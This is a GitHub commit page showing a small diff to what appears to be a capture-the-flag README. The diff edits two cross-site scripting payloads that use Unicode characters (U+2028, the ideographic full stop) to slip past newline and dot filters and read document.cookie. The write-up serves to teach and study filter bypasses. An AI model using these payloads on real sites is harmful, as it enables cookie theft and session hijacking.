We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent bc3d444 commit 7e8282aCopy full SHA for 7e8282a
README.md
@@ -119,7 +119,7 @@ Here we use unicode `U+2028` and `U+3002` to bypass `\n` and `.` filters.
119
120
```
121
http://3.114.5.202/fd.php
122
-?q=ssl。orange。tw?xx"+document[`cookie`]%E2%80%A8-->
+?q=ssl。orange。tw?xx"%2bdocument[`cookie`]%E2%80%A8-->
123
124
125
#### Unintended Solution
@@ -128,7 +128,7 @@ http://3.114.5.202/fd.php
128
129
130
131
-?q=ssl。orange。tw?`+"+document[`cookie`];(`${`
+?q=ssl。orange。tw?`%2b"%2bdocument[`cookie`];(`${`
132
133
134
#### Write Ups
0 commit comments